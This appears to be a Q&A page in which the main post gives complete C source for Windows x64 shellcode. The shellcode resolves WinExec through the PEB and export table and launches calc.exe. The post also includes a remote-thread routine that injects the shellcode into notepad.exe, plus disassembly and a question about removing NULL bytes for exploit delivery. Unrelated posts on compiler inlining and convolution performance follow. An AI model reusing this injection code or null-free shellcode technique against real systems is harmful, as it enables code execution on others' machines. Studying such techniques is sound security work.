How to remove NULL bytes from C generated shellcode? - c

For fun, I'm trying to rewrite this NASM Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) using Windows MSVC x86-64 as shown here:
// Windows x86-64 - Dynamic WinExec Calc.exe Shellcode 479 bytes.
#include <Windows.h>
#include <Winternl.h>
#include <stdio.h>
#include <tchar.h>
#include <psapi.h>
// KERNEL32.DLL
#define NREK 0x004e00520045004b
// GetProcAddress
#define AcorPteG 0x41636f7250746547
// In assembly language, the ret instruction is short for "return."
// It is used to transfer control back to the calling function, typically at the end of a subroutine.
#define RET_INSTRUCTION 0xC3
void shell_code_start()
{
// Get the current process' PEB address
_PEB* peb = (_PEB*)__readgsqword(0x60);
// Get the address of the loaded module list
PLIST_ENTRY moduleList = &peb->Ldr->InMemoryOrderModuleList;
// Loop through the loaded modules
for (PLIST_ENTRY currentModule = moduleList->Flink; currentModule != moduleList; currentModule = currentModule->Flink)
{
if (*(unsigned long long*)(((LDR_DATA_TABLE_ENTRY*)currentModule)->FullDllName.Buffer) == NREK)
{
// Get the LDR_DATA_TABLE_ENTRY for the current module
PLDR_DATA_TABLE_ENTRY pLdrEntry = CONTAINING_RECORD(currentModule, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
// Get the base address of kernel32.dll
HMODULE kernel32 = (HMODULE)pLdrEntry->DllBase;
// Get the DOS header of kernel32.dll
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)kernel32;
// Get the NT headers of kernel32.dll
PIMAGE_NT_HEADERS64 pNtHeaders = (PIMAGE_NT_HEADERS64)((BYTE*)pDosHeader + pDosHeader->e_lfanew);
// Get the export directory of kernel32.dll
PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)kernel32 + pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
// Get the array of function addresses of kernel32.dll
DWORD* pAddressOfFunctions = (DWORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfFunctions);
// Get the array of name addresses of kernel32.dll
DWORD* pAddressOfNames = (DWORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfNames);
// Get the array of ordinal numbers of kernel32.dll
WORD* pAddressOfNameOrdinals = (WORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfNameOrdinals);
// Loop through the names
for (DWORD i = 0; i < pExportDirectory->NumberOfNames; i++)
{
if (*(unsigned long long*)((BYTE*)kernel32 + pAddressOfNames[i]) == AcorPteG)
{
// Compare the name of the current function to "GetProcAddress"
// If it matches, get the address of the function by using the ordinal number
FARPROC getProcAddress = (FARPROC)((BYTE*)kernel32 + pAddressOfFunctions[pAddressOfNameOrdinals[i]]);
// Use GetProcAddress to find the address of WinExec
char winexec[] = { 'W','i','n','E','x','e','c',0 };
FARPROC winExec = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(getProcAddress))(kernel32, winexec);
// Use WinExec to launch calc.exe
char calc[] = { 'c','a','l','c','.','e','x','e',0 };
((FARPROC(WINAPI*)(LPCSTR, UINT))(winExec))(calc, SW_SHOW);
break;
}
}
break;
}
}
}
void print_shellcode(unsigned char* shellcode, int length)
{
printf("unsigned char shellcode[%d] = \n", length);
int i;
for (i = 0; i < length; i++)
{
if (i % 16 == 0)
{
printf("\"");
}
if (shellcode[i] == 0x00)
{
printf("\x1B[31m\\x%02x\033[0m", shellcode[i]);
}
else
{
printf("\\x%02x", shellcode[i]);
}
if ((i + 1) % 16 == 0)
{
printf("\"\n");
}
}
printf("\";\n");
}
DWORD GetNotepadPID()
{
DWORD dwPID = 0;
DWORD dwSize = 0;
DWORD dwProcesses[1024], cbNeeded;
if (EnumProcesses(dwProcesses, sizeof(dwProcesses), &cbNeeded))
{
for (DWORD i = 0; i < cbNeeded / sizeof(DWORD); i++)
{
if (dwProcesses[i] != 0)
{
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwProcesses[i]);
if (hProcess)
{
TCHAR szProcessName[MAX_PATH] = _T("<unknown>");
if (GetProcessImageFileName(hProcess, szProcessName, sizeof(szProcessName) / sizeof(TCHAR)))
{
_tcslwr(szProcessName);
if (_tcsstr(szProcessName, _T("notepad.exe")) != 0)
{
dwPID = dwProcesses[i];
break;
}
}
CloseHandle(hProcess);
}
}
}
}
return dwPID;
}
void InjectShellcodeIntoNotepad(unsigned char* shellcode, int length)
{
// Get the handle of the notepad.exe process
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetNotepadPID());
// Allocate memory for the shellcode in the notepad.exe process
LPVOID shellcodeAddr = VirtualAllocEx(hProcess, NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Write the shellcode to the allocated memory in the notepad.exe process
WriteProcessMemory(hProcess, shellcodeAddr, shellcode, length, NULL);
// Create a remote thread in the notepad.exe process to execute the shellcode
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)shellcodeAddr, NULL, 0, NULL);
// Wait for the remote thread to complete
WaitForSingleObject(hThread, INFINITE);
// Clean up
VirtualFreeEx(hProcess, shellcodeAddr, 0, MEM_RELEASE);
CloseHandle(hThread);
CloseHandle(hProcess);
}
int main(int argc, char* argv[])
{
unsigned int rel32 = 0;
// E9 is the Intel 64 opcode for a jmp instruction with a rel32 offset.
// The next four bytes contain the 32-bit offset.
char jmp_rel32[] = { 0xE9, 0x00, 0x00, 0x00, 0x00 };
// Calculate the relative offset of the jump instruction
rel32 = *(DWORD*)((char*)shell_code_start + 1);
// Get the actual starting address of the shellcode, by adding the relative offset to the address of the jump instruction
unsigned char *shell_code_start_real = (unsigned char *)shell_code_start + rel32 + sizeof(jmp_rel32);
// Get the actual end address of the shellcode by scanning the code looking for the ret instruction...
unsigned char *shell_code_end_real = shell_code_start_real;
while (*shell_code_end_real++ != RET_INSTRUCTION) {};
unsigned int sizeofshellcode = shell_code_end_real - shell_code_start_real;
// Copy the shellcode to the allocated memory and execute it...
LPVOID shellcode_mem = VirtualAlloc(NULL, sizeofshellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(shellcode_mem, shell_code_start_real, sizeofshellcode);
DWORD old_protect;
VirtualProtect(shellcode_mem, sizeofshellcode, PAGE_EXECUTE_READ, &old_protect);
void (*jump_to_shellcode)() = (void (*)())shellcode_mem;
jump_to_shellcode();
// Release the memory allocated for the shellcode
VirtualFree(shellcode_mem, sizeofshellcode, MEM_RELEASE);
// Print the shellcode in hex format
print_shellcode(shell_code_start_real, sizeofshellcode);
// Inject shellcode into the notepad.exe process
InjectShellcodeIntoNotepad(shell_code_start_real, sizeofshellcode);
return 0;
}
Everything runs correctly and pops up the Windows calculator.
However, the shellcode often needs to be delivered in a NULL-terminated string. If the shellcode contains NULL bytes, the C code that is being exploited might ignore and drop the rest of the code starting from the first zero byte.
Notice my shellcode has a sparse sprinkling of red NULL bytes!
Update
Based on the comments about modifying the assembly code, it's definitely possible to tweak the shellcode to remove most NULL bytes:
0000000000400000 40 55 push rbp
0000000000400002 48 81 EC F0 00 00 00 sub rsp,0F0h
0000000000400009 48 8D 6C 24 20 lea rbp,[rsp+20h]
000000000040000E 65 48 8B 04 25 60 00 00 00 mov rax,qword ptr gs:[60h]
0000000000400017 48 89 45 00 mov qword ptr [rbp],rax
000000000040001B 48 8B 45 00 mov rax,qword ptr [rbp]
000000000040001F 48 8B 40 18 mov rax,qword ptr [rax+18h]
0000000000400023 48 83 C0 20 add rax,20h
0000000000400027 48 89 45 08 mov qword ptr [rbp+8],rax
000000000040002B 48 8B 45 08 mov rax,qword ptr [rbp+8]
000000000040002F 48 8B 00 mov rax,qword ptr [rax]
0000000000400032 48 89 45 10 mov qword ptr [rbp+10h],rax
0000000000400036 EB 0B jmp 0000000000400043
0000000000400038 48 8B 45 10 mov rax,qword ptr [rbp+10h]
000000000040003C 48 8B 00 mov rax,qword ptr [rax]
000000000040003F 48 89 45 10 mov qword ptr [rbp+10h],rax
0000000000400043 48 8B 45 08 mov rax,qword ptr [rbp+8]
0000000000400047 48 39 45 10 cmp qword ptr [rbp+10h],rax
000000000040004B 0F 84 85 01 00 00 je 00000000004001D6
0000000000400051 48 8B 45 10 mov rax,qword ptr [rbp+10h]
0000000000400055 48 8B 40 50 mov rax,qword ptr [rax+50h]
0000000000400059 48 B9 4B 00 45 00 52 00 4E 00 mov rcx,4E00520045004Bh
0000000000400063 48 39 08 cmp qword ptr [rax],rcx
0000000000400066 0F 85 65 01 00 00 jne 00000000004001D1
000000000040006C 48 8B 45 10 mov rax,qword ptr [rbp+10h]
0000000000400070 48 83 E8 10 sub rax,10h
0000000000400074 48 89 45 18 mov qword ptr [rbp+18h],rax
0000000000400078 48 8B 45 18 mov rax,qword ptr [rbp+18h]
000000000040007C 48 8B 40 30 mov rax,qword ptr [rax+30h]
0000000000400080 48 89 45 20 mov qword ptr [rbp+20h],rax
0000000000400084 48 8B 45 20 mov rax,qword ptr [rbp+20h]
0000000000400088 48 89 45 28 mov qword ptr [rbp+28h],rax
000000000040008C 48 8B 45 28 mov rax,qword ptr [rbp+28h]
0000000000400090 48 63 40 3C movsxd rax,dword ptr [rax+3Ch]
0000000000400094 48 8B 4D 28 mov rcx,qword ptr [rbp+28h]
0000000000400098 48 03 C8 add rcx,rax
000000000040009B 48 8B C1 mov rax,rcx
000000000040009E 48 89 45 30 mov qword ptr [rbp+30h],rax
00000000004000A2 B8 08 00 00 00 mov eax,8
00000000004000A7 48 6B C0 00 imul rax,rax,0
00000000004000AB 48 8B 4D 30 mov rcx,qword ptr [rbp+30h]
00000000004000AF 8B 84 01 88 00 00 00 mov eax,dword ptr [rcx+rax+88h]
00000000004000B6 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000BA 48 03 C8 add rcx,rax
00000000004000BD 48 8B C1 mov rax,rcx
00000000004000C0 48 89 45 38 mov qword ptr [rbp+38h],rax
00000000004000C4 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000C8 8B 40 1C mov eax,dword ptr [rax+1Ch]
00000000004000CB 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000CF 48 03 C8 add rcx,rax
00000000004000D2 48 8B C1 mov rax,rcx
00000000004000D5 48 89 45 40 mov qword ptr [rbp+40h],rax
00000000004000D9 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000DD 8B 40 20 mov eax,dword ptr [rax+20h]
00000000004000E0 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000E4 48 03 C8 add rcx,rax
00000000004000E7 48 8B C1 mov rax,rcx
00000000004000EA 48 89 45 48 mov qword ptr [rbp+48h],rax
00000000004000EE 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000F2 8B 40 24 mov eax,dword ptr [rax+24h]
00000000004000F5 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000F9 48 03 C8 add rcx,rax
00000000004000FC 48 8B C1 mov rax,rcx
00000000004000FF 48 89 45 50 mov qword ptr [rbp+50h],rax
0000000000400103 C7 45 58 00 00 00 00 mov dword ptr [rbp+58h],0
000000000040010A EB 08 jmp 0000000000400114
000000000040010C 8B 45 58 mov eax,dword ptr [rbp+58h]
000000000040010F FF C0 inc eax
0000000000400111 89 45 58 mov dword ptr [rbp+58h],eax
0000000000400114 48 8B 45 38 mov rax,qword ptr [rbp+38h]
0000000000400118 8B 40 18 mov eax,dword ptr [rax+18h]
000000000040011B 39 45 58 cmp dword ptr [rbp+58h],eax
000000000040011E 0F 83 AB 00 00 00 jae 00000000004001CF
0000000000400124 8B 45 58 mov eax,dword ptr [rbp+58h]
0000000000400127 48 8B 4D 48 mov rcx,qword ptr [rbp+48h]
000000000040012B 8B 04 81 mov eax,dword ptr [rcx+rax*4]
000000000040012E 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
0000000000400132 48 BA 47 65 74 50 72 6F 63 41 mov rdx,41636F7250746547h
000000000040013C 48 39 14 01 cmp qword ptr [rcx+rax],rdx
0000000000400140 0F 85 84 00 00 00 jne 00000000004001CA
0000000000400146 8B 45 58 mov eax,dword ptr [rbp+58h]
0000000000400149 48 8B 4D 50 mov rcx,qword ptr [rbp+50h]
000000000040014D 0F B7 04 41 movzx eax,word ptr [rcx+rax*2]
0000000000400151 48 8B 4D 40 mov rcx,qword ptr [rbp+40h]
0000000000400155 8B 04 81 mov eax,dword ptr [rcx+rax*4]
0000000000400158 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
000000000040015C 48 03 C8 add rcx,rax
000000000040015F 48 8B C1 mov rax,rcx
0000000000400162 48 89 45 60 mov qword ptr [rbp+60h],rax
0000000000400166 C6 45 68 57 mov byte ptr [rbp+68h],57h
000000000040016A C6 45 69 69 mov byte ptr [rbp+69h],69h
000000000040016E C6 45 6A 6E mov byte ptr [rbp+6Ah],6Eh
0000000000400172 C6 45 6B 45 mov byte ptr [rbp+6Bh],45h
0000000000400176 C6 45 6C 78 mov byte ptr [rbp+6Ch],78h
000000000040017A C6 45 6D 65 mov byte ptr [rbp+6Dh],65h
000000000040017E C6 45 6E 63 mov byte ptr [rbp+6Eh],63h
0000000000400182 C6 45 6F 00 mov byte ptr [rbp+6Fh],0
0000000000400186 48 8D 55 68 lea rdx,[rbp+68h]
000000000040018A 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
000000000040018E FF 55 60 call qword ptr [rbp+60h]
0000000000400191 48 89 45 70 mov qword ptr [rbp+70h],rax
0000000000400195 C6 45 78 63 mov byte ptr [rbp+78h],63h
0000000000400199 C6 45 79 61 mov byte ptr [rbp+79h],61h
000000000040019D C6 45 7A 6C mov byte ptr [rbp+7Ah],6Ch
00000000004001A1 C6 45 7B 63 mov byte ptr [rbp+7Bh],63h
00000000004001A5 C6 45 7C 2E mov byte ptr [rbp+7Ch],2Eh
00000000004001A9 C6 45 7D 65 mov byte ptr [rbp+7Dh],65h
00000000004001AD C6 45 7E 78 mov byte ptr [rbp+7Eh],78h
00000000004001B1 C6 45 7F 65 mov byte ptr [rbp+7Fh],65h
00000000004001B5 C6 85 80 00 00 00 00 mov byte ptr [rbp+80h],0
00000000004001BC BA 05 00 00 00 mov edx,5
00000000004001C1 48 8D 4D 78 lea rcx,[rbp+78h]
00000000004001C5 FF 55 70 call qword ptr [rbp+70h]
00000000004001C8 EB 05 jmp 00000000004001CF
00000000004001CA E9 3D FF FF FF jmp 000000000040010C
00000000004001CF EB 05 jmp 00000000004001D6
00000000004001D1 E9 62 FE FF FF jmp 0000000000400038
00000000004001D6 48 8D A5 D0 00 00 00 lea rsp,[rbp+0D0h]
00000000004001DD 5D pop rbp
00000000004001DE C3 ret
Although I'm not sure how to handle a NULL-terminated string such as "calc.exe" which generates 4 NULL bytes:
0000000000400195 C6 45 78 63 mov byte ptr [rbp+78h],63h
0000000000400199 C6 45 79 61 mov byte ptr [rbp+79h],61h
000000000040019D C6 45 7A 6C mov byte ptr [rbp+7Ah],6Ch
00000000004001A1 C6 45 7B 63 mov byte ptr [rbp+7Bh],63h
00000000004001A5 C6 45 7C 2E mov byte ptr [rbp+7Ch],2Eh
00000000004001A9 C6 45 7D 65 mov byte ptr [rbp+7Dh],65h
00000000004001AD C6 45 7E 78 mov byte ptr [rbp+7Eh],78h
00000000004001B1 C6 45 7F 65 mov byte ptr [rbp+7Fh],65h
00000000004001B5 C6 85 80 00 00 00 00 mov byte ptr [rbp+80h],0
Question
Is it possible to remove the NULL bytes by reshuffling the C code or maybe using compiler intrinsic tricks?

Related

Inline functions expansion with inner switch

Consider the scenario where you have a complex procedure that have a state machine and is tracked with a state that never changes during a call to kernel, as in code illustrated below.
static inline void kernel(int recursion, int mode){
if(!recursion) return;
// branches all lead to similar switch cases here.
// logical branches and loops can be quite complicated.
switch(mode){
default return;
case 1: mode1(recursion-1);
case 2: mode2(recursion-1);
}
}
void mode1(int recursion){
kernel(recursion,1)
}
void mode2(int recursion){
kernel(recursion,2)
}
If only mode1 and mode2 functions are called elsewhere, can recent compilers eliminate the inner branches?
All functions are in the same compilation unit.
Came across this while implementing a interpreter for a subset of spirv byte code. The inner branch is for finding out how much to allocate, building up the AST, and doing the actual evaluation of expressions. The kernel takes care of traversing the tree, with all the switch on instruction OpCodes. Writing separate functions for each state will be even more difficult to maintain, since the kernel already takes up 1000+ loc, and moving up and down for the same traversal point and keeping them the same can be really difficult.
(I know modern c++ have constexpr if, but this is pure c code.)
Edit:
I've tried with msvc compiler with the following code:
uint32_t interp_code[]={1,2,1,1,2};
void mode1(const uint32_t* code, int recursion);
void mode2(const uint32_t* code, int recursion);
static INLINE void kernel(const uint32_t* code, int recursion, int mode)
{
if (!recursion) return;
// branches all lead to similar switch cases here.
// logical branches and loops can be quite complicated.
switch (*code) {
default: return;
case 1:
switch (mode) {
default: return;
case 1: mode1(code + 1, recursion - 1);
case 2: mode2(code + 1, recursion - 1);
}
case 2:
switch(mode) {
default: return;
case 1: mode2(code + 1, recursion - 1);
case 2: mode1(code + 1, recursion - 1);
}
}
}
void mode1(const uint32_t* code,int recursion)
{
kernel(code, recursion, 1);
}
void mode2(const uint32_t* code, int recursion)
{
kernel(code, recursion, 2);
}
int main()
{
mode1(interp_code, 5);
return 0;
}
Using inline in the INLINE place yielded a function call (O2 optimizations), and using __forceinline yields the two modes compiled separately with no function call.
Disassembly for inline:
31: void mode1(const uint32_t* code,int recursion)
32: {
00007FF65F8910C0 48 83 EC 28 sub rsp,28h
33: kernel(code, recursion, 1);
00007FF65F8910C4 85 D2 test edx,edx
00007FF65F8910C6 74 6C je mode1+74h (07FF65F891134h)
00007FF65F8910C8 48 89 5C 24 30 mov qword ptr [rsp+30h],rbx
00007FF65F8910CD 48 8D 59 04 lea rbx,[rcx+4]
00007FF65F8910D1 48 89 74 24 38 mov qword ptr [rsp+38h],rsi
00007FF65F8910D6 48 89 7C 24 20 mov qword ptr [rsp+20h],rdi
00007FF65F8910DB 8D 7A FF lea edi,[rdx-1]
00007FF65F8910DE 66 90 xchg ax,ax
00007FF65F8910E0 8B 4B FC mov ecx,dword ptr [rbx-4]
00007FF65F8910E3 8B F7 mov esi,edi
00007FF65F8910E5 83 E9 01 sub ecx,1
00007FF65F8910E8 74 07 je mode1+31h (07FF65F8910F1h)
00007FF65F8910EA 83 F9 01 cmp ecx,1
00007FF65F8910ED 75 36 jne mode1+65h (07FF65F891125h)
00007FF65F8910EF EB 1A jmp mode1+4Bh (07FF65F89110Bh)
00007FF65F8910F1 8B D7 mov edx,edi
00007FF65F8910F3 48 8B CB mov rcx,rbx
00007FF65F8910F6 E8 C5 FF FF FF call mode1 (07FF65F8910C0h)
00007FF65F8910FB 41 B8 02 00 00 00 mov r8d,2
00007FF65F891101 8B D7 mov edx,edi
00007FF65F891103 48 8B CB mov rcx,rbx
00007FF65F891106 E8 F5 FE FF FF call kernel (07FF65F891000h)
00007FF65F89110B 41 B8 02 00 00 00 mov r8d,2
00007FF65F891111 8B D7 mov edx,edi
00007FF65F891113 48 8B CB mov rcx,rbx
00007FF65F891116 E8 E5 FE FF FF call kernel (07FF65F891000h)
00007FF65F89111B FF CF dec edi
00007FF65F89111D 48 83 C3 04 add rbx,4
00007FF65F891121 85 F6 test esi,esi
00007FF65F891123 75 BB jne mode1+20h (07FF65F8910E0h)
00007FF65F891125 48 8B 74 24 38 mov rsi,qword ptr [rsp+38h]
00007FF65F89112A 48 8B 5C 24 30 mov rbx,qword ptr [rsp+30h]
00007FF65F89112F 48 8B 7C 24 20 mov rdi,qword ptr [rsp+20h]
34: }
00007FF65F891134 48 83 C4 28 add rsp,28h
00007FF65F891138 C3 ret
For __forceinline:
31: void mode1(const uint32_t* code,int recursion)
32: {
00007FF670271002 EC in al,dx
00007FF670271003 28 85 D2 74 60 48 sub byte ptr [rbp+486074D2h],al
33: kernel(code, recursion, 1);
00007FF670271009 89 5C 24 30 mov dword ptr [rsp+30h],ebx
00007FF67027100D 48 8D 59 04 lea rbx,[rcx+4]
00007FF670271011 48 89 74 24 38 mov qword ptr [rsp+38h],rsi
00007FF670271016 48 89 7C 24 20 mov qword ptr [rsp+20h],rdi
00007FF67027101B 8D 7A FF lea edi,[rdx-1]
00007FF67027101E 66 90 xchg ax,ax
00007FF670271020 8B 4B FC mov ecx,dword ptr [rbx-4]
00007FF670271023 8B F7 mov esi,edi
00007FF670271025 83 E9 01 sub ecx,1
00007FF670271028 74 07 je mode1+31h (07FF670271031h)
00007FF67027102A 83 F9 01 cmp ecx,1
00007FF67027102D 75 2A jne mode1+59h (07FF670271059h)
00007FF67027102F EB 14 jmp mode1+45h (07FF670271045h)
00007FF670271031 8B D7 mov edx,edi
00007FF670271033 48 8B CB mov rcx,rbx
00007FF670271036 E8 C5 FF FF FF call mode1 (07FF670271000h)
00007FF67027103B 8B D7 mov edx,edi
00007FF67027103D 48 8B CB mov rcx,rbx
00007FF670271040 E8 2B 00 00 00 call mode2 (07FF670271070h)
00007FF670271045 8B D7 mov edx,edi
00007FF670271047 48 8B CB mov rcx,rbx
00007FF67027104A E8 21 00 00 00 call mode2 (07FF670271070h)
00007FF67027104F FF CF dec edi
00007FF670271051 48 83 C3 04 add rbx,4
00007FF670271055 85 F6 test esi,esi
00007FF670271057 75 C7 jne mode1+20h (07FF670271020h)
00007FF670271059 48 8B 74 24 38 mov rsi,qword ptr [rsp+38h]
00007FF67027105E 48 8B 5C 24 30 mov rbx,qword ptr [rsp+30h]
00007FF670271063 48 8B 7C 24 20 mov rdi,qword ptr [rsp+20h]
34: }
00007FF670271068 48 83 C4 28 add rsp,28h
00007FF67027106C C3 ret
It seems with inline the compiler chose to inline the entirety of mode2 function body, and make kernel a separate function call. __forceinline forced the mode1 and mode2 to compile into two function bodies with the kernel. (This code doesn't break on the case, so fall through is expected)
Working with inline directive yields just the same code as nothing specified in INLINE in O2

Convolution Function Latency Bottleneck

I have implemented a Convolutional Neural Network in C and have been studying what parts of it have the longest latency.
Based on my research, the massive amounts of matricial multiplication required by CNNs makes running them on CPUs and even GPUs very inefficient. However, when I actually profiled my code (on an unoptimized build) I found out that something other than the multiplication itself was the bottleneck of the implementation.
After turning on optimization (-O3 -march=native -ffast-math, gcc cross compiler), the Gprof result was the following:
Clearly, the convolution2D function takes the largest amount of time to run, followed by the batch normalization and depthwise convolution functions.
The convolution function in question looks like this:
void convolution2D(int isize, // width/height of input
int osize, // width/height of output
int ksize, // width/height of kernel
int stride, // shift between input pixels, between consecutive outputs
int pad, // offset between (0,0) pixels between input and output
int idepth, int odepth, // number of input and output channels
float idata[isize][isize][idepth],
float odata[osize][osize][odepth],
float kdata[odepth][ksize][ksize][idepth])
{
// iterate over the output
for (int oy = 0; oy < osize; ++oy) {
for (int ox = 0; ox < osize; ++ox) {
for (int od = 0; od < odepth; ++od) {
odata[oy][ox][od] = 0; // When you iterate multiple times without closing the program, this number would stack up to infinity, so we have to zero it out every time.
for (int ky = 0; ky < ksize; ++ky) {
for (int kx = 0; kx < ksize; ++kx) {
// map position in output and kernel to the input
int iy = stride * oy + ky - pad;
int ix = stride * ox + kx - pad;
// use only valid inputs
if (iy >= 0 && iy < isize && ix >= 0 && ix < isize)
for (int id = 0; id < idepth; ++id)
odata[oy][ox][od] += kdata[od][ky][kx][id] * idata[iy][ix][id];
}}
}}}
}
This is a design based on my previous question and most of the processing time should fall on the convolution itself: odata[oy][ox][od] += kdata[od][ky][kx][id] * idata[iy][ix][id];.
Using objdump -drwC -Mintel to take a look at the assembly code returns me the following:
0000000000007880 <convolution2D>:
7880: f3 0f 1e fa endbr64
7884: 55 push rbp
7885: 48 89 e5 mov rbp,rsp
7888: 41 57 push r15
788a: 41 56 push r14
788c: 41 55 push r13
788e: 41 54 push r12
7890: 53 push rbx
7891: 48 81 ec b0 00 00 00 sub rsp,0xb0
7898: ff 15 4a a7 00 00 call QWORD PTR [rip+0xa74a] # 11fe8 <mcount#GLIBC_2.2.5>
789e: 89 d3 mov ebx,edx
78a0: 89 55 a8 mov DWORD PTR [rbp-0x58],edx
78a3: 89 8d 74 ff ff ff mov DWORD PTR [rbp-0x8c],ecx
78a9: 49 63 d1 movsxd rdx,r9d
78ac: 48 63 cf movsxd rcx,edi
78af: 41 89 f2 mov r10d,esi
78b2: 89 b5 38 ff ff ff mov DWORD PTR [rbp-0xc8],esi
78b8: 49 63 c0 movsxd rax,r8d
78bb: 48 0f af ca imul rcx,rdx
78bf: 48 63 75 10 movsxd rsi,DWORD PTR [rbp+0x10]
78c3: 49 89 d6 mov r14,rdx
78c6: 4c 8d 24 95 00 00 00 00 lea r12,[rdx*4+0x0]
78ce: 41 89 fd mov r13d,edi
78d1: 49 89 cb mov r11,rcx
78d4: 48 89 8d 60 ff ff ff mov QWORD PTR [rbp-0xa0],rcx
78db: 49 63 ca movsxd rcx,r10d
78de: 4c 8d 0c b5 00 00 00 00 lea r9,[rsi*4+0x0]
78e6: 49 89 f0 mov r8,rsi
78e9: 48 0f af f1 imul rsi,rcx
78ed: 48 63 cb movsxd rcx,ebx
78f0: 4c 89 8d 48 ff ff ff mov QWORD PTR [rbp-0xb8],r9
78f7: 48 0f af d1 imul rdx,rcx
78fb: 48 8d 3c 95 00 00 00 00 lea rdi,[rdx*4+0x0]
7903: 45 85 d2 test r10d,r10d
7906: 0f 8e 73 02 00 00 jle 7b7f <convolution2D+0x2ff>
790c: 48 c1 ef 02 shr rdi,0x2
7910: 49 c1 e9 02 shr r9,0x2
7914: 48 89 7d c8 mov QWORD PTR [rbp-0x38],rdi
7918: 4c 89 e7 mov rdi,r12
791b: 4c 89 8d 58 ff ff ff mov QWORD PTR [rbp-0xa8],r9
7922: 48 c1 ef 02 shr rdi,0x2
7926: 48 89 bd 50 ff ff ff mov QWORD PTR [rbp-0xb0],rdi
792d: 45 85 c0 test r8d,r8d
7930: 0f 8e 49 02 00 00 jle 7b7f <convolution2D+0x2ff>
7936: 48 c1 e6 02 shl rsi,0x2
793a: 48 0f af d1 imul rdx,rcx
793e: 29 c3 sub ebx,eax
7940: 89 c7 mov edi,eax
7942: 48 89 b5 30 ff ff ff mov QWORD PTR [rbp-0xd0],rsi
7949: 48 8b 75 20 mov rsi,QWORD PTR [rbp+0x20]
794d: 48 89 85 68 ff ff ff mov QWORD PTR [rbp-0x98],rax
7954: f7 df neg edi
7956: 45 8d 7e ff lea r15d,[r14-0x1]
795a: 89 9d 70 ff ff ff mov DWORD PTR [rbp-0x90],ebx
7960: 89 bd 3c ff ff ff mov DWORD PTR [rbp-0xc4],edi
7966: 48 8d 0c 95 00 00 00 00 lea rcx,[rdx*4+0x0]
796e: 89 7d ac mov DWORD PTR [rbp-0x54],edi
7971: 89 5d d4 mov DWORD PTR [rbp-0x2c],ebx
7974: 48 89 4d 98 mov QWORD PTR [rbp-0x68],rcx
7978: 4a 8d 0c 9d 00 00 00 00 lea rcx,[r11*4+0x0]
7980: c7 45 80 00 00 00 00 mov DWORD PTR [rbp-0x80],0x0
7987: 48 89 75 88 mov QWORD PTR [rbp-0x78],rsi
798b: 41 8d 70 ff lea esi,[r8-0x1]
798f: 48 89 4d c0 mov QWORD PTR [rbp-0x40],rcx
7993: 48 8d 04 b5 04 00 00 00 lea rax,[rsi*4+0x4]
799b: c7 45 90 00 00 00 00 mov DWORD PTR [rbp-0x70],0x0
79a2: 48 89 85 28 ff ff ff mov QWORD PTR [rbp-0xd8],rax
79a9: 44 89 f0 mov eax,r14d
79ac: 45 89 ee mov r14d,r13d
79af: 41 89 c5 mov r13d,eax
79b2: 48 8b 85 28 ff ff ff mov rax,QWORD PTR [rbp-0xd8]
79b9: 48 03 45 88 add rax,QWORD PTR [rbp-0x78]
79bd: 48 c7 85 78 ff ff ff 00 00 00 00 mov QWORD PTR [rbp-0x88],0x0
79c8: c7 45 84 00 00 00 00 mov DWORD PTR [rbp-0x7c],0x0
79cf: c7 45 94 00 00 00 00 mov DWORD PTR [rbp-0x6c],0x0
79d6: 44 8b 95 70 ff ff ff mov r10d,DWORD PTR [rbp-0x90]
79dd: 48 89 45 b0 mov QWORD PTR [rbp-0x50],rax
79e1: 48 63 45 80 movsxd rax,DWORD PTR [rbp-0x80]
79e5: 48 2b 85 68 ff ff ff sub rax,QWORD PTR [rbp-0x98]
79ec: 48 0f af 85 60 ff ff ff imul rax,QWORD PTR [rbp-0xa0]
79f4: 48 89 85 40 ff ff ff mov QWORD PTR [rbp-0xc0],rax
79fb: 8b 85 3c ff ff ff mov eax,DWORD PTR [rbp-0xc4]
7a01: 89 45 d0 mov DWORD PTR [rbp-0x30],eax
7a04: 48 8b 45 88 mov rax,QWORD PTR [rbp-0x78]
7a08: 48 8b 9d 78 ff ff ff mov rbx,QWORD PTR [rbp-0x88]
7a0f: 4c 8d 04 98 lea r8,[rax+rbx*4]
7a13: 48 8b 45 28 mov rax,QWORD PTR [rbp+0x28]
7a17: 48 8b 5d 18 mov rbx,QWORD PTR [rbp+0x18]
7a1b: 48 89 45 b8 mov QWORD PTR [rbp-0x48],rax
7a1f: 48 63 45 84 movsxd rax,DWORD PTR [rbp-0x7c]
7a23: 48 2b 85 68 ff ff ff sub rax,QWORD PTR [rbp-0x98]
7a2a: 48 0f af 85 50 ff ff ff imul rax,QWORD PTR [rbp-0xb0]
7a32: 48 03 85 40 ff ff ff add rax,QWORD PTR [rbp-0xc0]
7a39: 48 8d 04 83 lea rax,[rbx+rax*4]
7a3d: 48 89 45 a0 mov QWORD PTR [rbp-0x60],rax
7a41: 66 66 2e 0f 1f 84 00 00 00 00 00 data16 nop WORD PTR cs:[rax+rax*1+0x0]
